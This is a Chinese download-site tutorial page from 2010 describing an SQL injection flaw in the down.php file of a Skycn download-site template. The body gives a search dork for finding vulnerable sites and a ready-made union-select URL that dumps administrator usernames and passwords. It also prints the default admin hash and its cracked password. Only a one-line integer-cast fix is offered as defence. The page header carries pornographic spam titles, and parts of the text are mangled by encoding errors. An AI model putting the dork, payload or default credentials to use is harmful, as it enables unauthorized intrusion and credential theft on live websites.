日本好好热aⅴ|国产99视频精品免费观看|日本成人aV在线|久热香蕉国产在线

• 電腦軟件
• 單機(jī)游戲
• 安卓應(yīng)用
• 安卓游戲
• 蘋果電腦
• 蘋果手機(jī)

軟件

軟件

文章

搜索

首頁 → 西西教程 → 數(shù)據(jù)庫教程 → 天空下載站(skycn)程序存在SQL注入漏洞及最新解決方案

天空下載站(skycn)程序存在SQL注入漏洞及最新解決方案

相關(guān)軟件相關(guān)文章發(fā)表評論 來源：本站整理時(shí)間：2010/8/6 13:35:29字體大�。�A-A+

作者：佚名點(diǎn)擊：77次評論：0次標(biāo)簽： SQL

2014年辛星mysql教程秋季版之夯實(shí)基礎(chǔ)

• 類型：電子教程大�。�8.5M語言：中文 評分：8.3
• 標(biāo)簽：

立即下載

天空下載站是國內(nèi)著名的下載站點(diǎn)，提供國內(nèi)外最新免費(fèi)軟件、共享軟件下載。其在全國各地鐵通、聯(lián)通、電信、信息港等都建有以php+MySql架設(shè)的下載分站，相當(dāng)一部分下載分站的建站程序采用同一套建站模板，而這套建站模板存在SQL注入漏洞。
關(guān)鍵詞：inurl:down.php

漏洞文件：down.php

down.php中沒有對get變量$id做任何過濾措施，導(dǎo)致攻擊者可以任意使用SQL注入語句進(jìn)行攻擊，通過測試發(fā)現(xiàn)，多數(shù)管理員登陸口令默認(rèn)密碼并未修改，默認(rèn)管理員信息為1111_7363a304be1a682efaf10702fc7b97d8，解密密碼hash可知默認(rèn)密碼為sky!@#cn！

 

注入利用：

keyword:Copyright©1998 - 2007 Skycn.com All Rights Reserved inurl:down.php

http://site.com/down.php?id=1+union+select+column_numbers+from+table_name

column_numbers:不固定，通常為50+,也有少于40,例如臨沂信息港測試為38個(gè)顯示位

table_name:管理員表段名為master,字段名為username,password

在字段2軟件標(biāo)題顯示位填寫concat(username,0x5f,password)即可爆出管理員登陸口令

SQL EXP：

http://download.site.com/down.php?id=47488+and+1=2+union+select+1,concat(username,0x5f,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,

22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+master

 

安全提示：

解決方法：$id=(int)$_GET['id'];

相關(guān)文章

03-17SQL Server ErrorLog文件過大c盤沒有空間 EXEC sp_cycle_errorlo

01-05MySQL Community Server安裝失敗怎么辦 MySQL Community Server正

10-20SQL Server 2005 自動備份數(shù)據(jù)庫 維護(hù)計(jì)劃實(shí)現(xiàn)數(shù)據(jù)庫定時(shí)自動備份

09-24mssql數(shù)據(jù)庫沒有了SA密碼 無法Windows集成身份登錄解決方案

09-17MSSQL如何讓用戶只能訪問特定的數(shù)據(jù)庫

09-14Oracle數(shù)據(jù)庫該如何著手優(yōu)化一個(gè)SQL

05-07MS SQL Server Management Studio Express安裝圖文教程

02-03navicat for mysql怎么用？navicat 連接mysql Navicat中文版使用

02-03SQLSERVER 2005數(shù)據(jù)庫備份、還原及數(shù)據(jù)恢復(fù)圖文教程

02-02SQLyog中文亂碼的解決方法

相關(guān)評論

閱讀本文后您有什么感想? 已有23人給出評價(jià)!

• 8 喜歡
• 3 頂
• 1 難過
• 5 囧
• 3 圍觀
• 2 無聊

熱門評論

最新評論

發(fā)表評論 查看所有評論(0)

昵稱:

表情:

字?jǐn)?shù): 0/500 (您的評論需要經(jīng)過審核才能顯示)

推薦文章

安裝MSDE2000，提示“為了安全起見，要求使用強(qiáng) SA 密碼。” SQL Server 2008 中文版全安裝過程圖文介紹

• Toad常用快捷鍵大全-Toad快捷鍵設(shè)置 TOAD使用筆記
• 安裝MSDE2000，提示“為了安全起見，要求使用強(qiáng) SA 密碼。”
• sql server 中Datediff函數(shù)查詢幾天內(nèi)數(shù)據(jù)
• SQL Server 2008 中文版全安裝過程圖文介紹
• SQL Server 2005的安裝過程介紹

相關(guān)下載

名稱大小下載

• 12014年辛星mysql教程秋季版之夯實(shí)基礎(chǔ)8.5M下載
• 2Access to MySQL (ACCESS轉(zhuǎn)Mysql)1.7M下載
• 3access工具(用SQL語言進(jìn)行數(shù)據(jù)維護(hù))343KB下載
• 4Access數(shù)據(jù)庫轉(zhuǎn)換為MySQL(Access To MySQL)3.1M下載
• 5Access數(shù)據(jù)轉(zhuǎn)換為MSSQL(Access to MSSQL)3.1M下載
• 6access轉(zhuǎn)Mysql(Access2MySQL Pro)8M下載
• 7Ajax+jsp+MySQL實(shí)現(xiàn)動態(tài)樹形菜單510KB下載
• 8Alternate Firebird Copy火鳥數(shù)據(jù)備份SQL編輯器851KB下載
• 9AppServ(集成了PHP 6.0 MYSQL 6.0等)21M下載
• 10ASA數(shù)據(jù)庫修復(fù)工具(Repair for Sybase SQL Anywhere)2.8M下載

最新文章

• 

  安裝MSDE2000，提示“為了安全起見，要

  10-09-11
• 

  SQL Server 2008 中文版全安裝過程圖文

  10-05-22